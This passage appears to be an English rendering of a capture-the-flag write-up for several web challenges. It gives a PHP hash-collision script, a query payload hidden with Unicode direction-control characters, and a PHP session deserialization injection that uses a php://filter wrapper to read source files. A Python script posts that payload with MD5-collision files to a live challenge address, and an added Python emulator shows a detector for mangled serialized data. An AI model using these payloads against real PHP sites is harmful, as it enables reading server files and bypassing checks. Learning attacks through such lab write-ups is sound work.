        for sha11 in 'abcdefghijklmnopqrstuvwxyz':
            for sha2 in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
                sha = chr(ord(sha11) ^ ord(sha2))
                if sha in ' (81&-':
                    print(sha11, sha2, sha)

  In the end aaaaaa and AIYPGL satisfy the conditions

3. Write a PHP script to bypass myhash

        <?php
        function MyHashCode($str)
        {
            $hash = 0;
            $len = strlen($str);
            for ($i = 0; $i < $len; $i++) {
                $hash = intval40(intval40(40 * $hash) + ord($str[$i]));
            }
            return abs($hash);
        }

        function intval40($code)
        {
            $flag = $code >> 32;
            if ($flag == 1) {
                $code = ~($code - 1);
                return $code * -1;
            } else {
                return $code;
            }
        }

        $a = "abcdefghijklmnopqrstuvwxyz";
        echo MyHashCode("ISCCNOTHARD");
        for ($i = 0; $i < strlen($a); $i++) {
            echo "<br>";
            echo MyHashCode("IS" . $a[$i] . "CNOTHARD");
            if (MyHashCode("IR" . $a[$i] . "CNOTHARD") === MyHashCode("ISCCNOTHARD")) {
                echo "IR" . $a[$i] . "CNOTHARD";
            }
        }

IRkCNOTHARD satisfies the condition

// One of the variables contains Unicode control characters and is displayed reversed; copying it as-is works

Build the payload

/?password=1&%E2%80%AE%E2%81%A6//sha2%E2%81%A9%E2%81%A6sha2=AIYPGL&sha1=aaaaaa&username=A40481&password=IRkCNOTHARD
 

 

web    羊了个羊.txt (Sheep a Sheep)

1. Search for max in vue.global.js

2. maxLevel is the highest level

3. Set maxLevel to 2 to get the flag

## Alternatively, search for alert directly

A base64 string turns up; decode it

web    老狼老狼几点了.txt (Old wolf, what time is it?)

1. Run time=0-60 through Burp Suite

2. time=12 displays the source code

3. The idea is to use include() with a php:// filter wrapper to read flag.php

4. The filter is applied to the serialized content, which is then unserialized; this breaks the structure of the serialized string

Submit _SESSION[base64base64]=000";s:1:"1";s:8:"function";s:4:"hack";s:4:"file";s:58:"php://filter/read=convert.babase64se64-encode/resource=index.php";}

Serialized: a:3:{s:12:"base64base64";s:123:"000";s:1:"1";s:8:"function";s:4:"hack";s:4:"file";s:58:"php://filter/read=convert.babase64se64-encode/resource=index.php";}";s:4:"file";s:8:"time.php";s:8:"function";s:9:"show_time";}

After filtering: a:3:{s:12:"";s:123:"000";s:1:"1";s:8:"function";s:4:"hack";s:4:"file";s:58:"php://filter/read=convert.base64-encode/resource=index.php";}";s:4:"file";s:8:"time.php";s:8:"function";s:9:"show_time";}

The pieces join up into a new serialized value
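Step 4 is the classic length-prefix desynchronisation: str_replace shortens one string inside the serialized blob, but the s:12: prefix in front of it still claims twelve bytes, so unserialize() reads the attacker's text as structure. The Python below is an added illustration, not the challenge's PHP: it serializes and unserializes PHP-style string arrays the way PHP counts them, reproduces the step-4 filter on the exact session from the write-up, and adds a cheap integrity check (the blob must re-serialize to itself) that flags the mangled cookie. The same length-prefixed layout is what the password injection in ISCC单身节抽奖 relies on. Input is assumed ASCII, because PHP counts bytes where this emulator counts characters.

```python
def php_serialize(value) -> str:
    """Serialize str / dict[str, str] like PHP's serialize() (ASCII assumed)."""
    if isinstance(value, str):
        return f's:{len(value)}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type {type(value).__name__}")


def _parse(data: str, pos: int):
    kind = data[pos]
    if kind == "s":                                   # s:<len>:"<bytes>";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                             # skip ':"'
        text = data[start:start + length]             # trusts the declared length
        if data[start + length:start + length + 2] != '";':
            raise ValueError(f"string terminator missing at offset {start + length}")
        return text, start + length + 2
    if kind == "a":                                   # a:<n>:{key value ...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                               # skip ':{'
        result = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            value, pos = _parse(data, pos)
            result[key] = value
        if data[pos] != "}":
            raise ValueError(f"array terminator missing at offset {pos}")
        return result, pos + 1
    raise ValueError(f"unsupported type {kind!r} at offset {pos}")


def php_unserialize(data: str):
    """Like PHP: parse one value by its declared lengths and ignore trailing bytes."""
    value, _ = _parse(data, 0)
    return value


def session_filter(blob: str) -> str:
    """The step-4 filter: strip the word base64 from the already-serialized string."""
    return blob.replace("base64", "")


def is_intact(blob: str) -> bool:
    """A blob whose parse does not re-serialize to the same bytes has been cut."""
    try:
        return php_serialize(php_unserialize(blob)) == blob
    except (ValueError, IndexError):
        return False


# The session from step 4 of the write-up.
INJECTED_VALUE = ('000";s:1:"1";s:8:"function";s:4:"hack";s:4:"file";'
                  's:58:"php://filter/read=convert.babase64se64-encode/resource=index.php";}')
SESSION = {"base64base64": INJECTED_VALUE, "file": "time.php", "function": "show_time"}

if __name__ == "__main__":
    raw = php_serialize(SESSION)
    print(php_unserialize(raw)["function"], is_intact(raw))
    mangled = session_filter(raw)
    print(php_unserialize(mangled)["function"], is_intact(mangled))
```

The round-trip check is a cheap detector, not a fix: the fix is to validate and filter field values before they are serialized, so no transformation ever runs over a blob whose length prefixes have already been computed.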
 

5. Finally, an MD5 collision, submitted together with the content above

        import time

        import requests

        s = requests.session()

        def post1():
            url1 = "http://47.94.14.162:10007/guess_time.php"
            payload = 'sss";s:1:"1";s:8:"function";s:4:"hack";s:4:"file";s:57:"php://filter/read=convert.babase64se64-encode/resource=flag.php";}'
            with open("a.txt", 'rb') as f1, open("b.txt", 'rb') as f2:
                data = {
                    "param1": f1.read(),
                    "param2": f2.read(),
                    "_SESSION[base64base64]": payload,
                    "_SESSION[file]": "time.php",
                    "_SESSION[function]": "hack",
                }
            r = s.post(url1, data=data)
            # if "PD" in r.text:   # base64 of "<?" starts with PD
            print(r.text)

        while True:
            post1()
            time.sleep(0.5)

a.txt and b.txt are two files generated with fastcoll that share the same MD5 hash and whose content starts with the unix timestamp

6. Shift the time a little later and the collision succeeds
